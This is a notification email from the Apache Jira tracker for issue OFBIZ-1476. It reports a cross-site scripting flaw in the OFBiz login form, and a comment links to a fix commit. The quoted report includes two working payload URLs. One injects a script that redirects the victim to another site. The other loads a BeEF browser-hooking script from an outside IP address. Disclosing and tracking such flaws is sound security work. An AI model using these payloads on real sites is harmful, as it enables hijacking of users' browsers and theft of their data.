[
https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17307745#comment-17307745
] sonny brown jr commented on OFBIZ-1476: --------------------------------------- https://gitbox.apache.org/repos/asf?p=ofbiz-framework.git;h=00200bf > XSS vulnerability in OFBiz Login Form > ------------------------------------- > > Key: OFBIZ-1476 > URL: https://issues.apache.org/jira/browse/OFBIZ-1476 > Project: OFBiz > Issue Type: Bug > Components: product > Reporter: Emmanuel Saracco > Assignee: Jacques Le Roux > Priority: Major > > Hi, > There is a Cross Site Scripting vulnerability in OFBiz login form that allow > a attacker to stole user's data. > PoC: > * Redirection to another site: > https://demo.hotwaxmedia.com/ecommerce/control/login?USERNAME=a%22%3E%3Cscript%3Edocument.location.href%3D%27http%3A%2F%2Fwww.bindshell.net%27%3B%3C%2Fscript%3E%3Ca+name%3D%22a > * BeEF injection: > https://demo.hotwaxmedia.com/catalog/control/login?USERNAME=a%22%3E%3Cscript%20language=%22javascript%22%20src=%22http://192.168.4.2/beef/hook/beefmagic.js.php%22%3E%3C/script%3E%3Ca%20name=%22a > Same thing using "PASSWORD" instead of "USERNAME". > Bye -- This message was sent by Atlassian Jira (v8.3.4#803005)
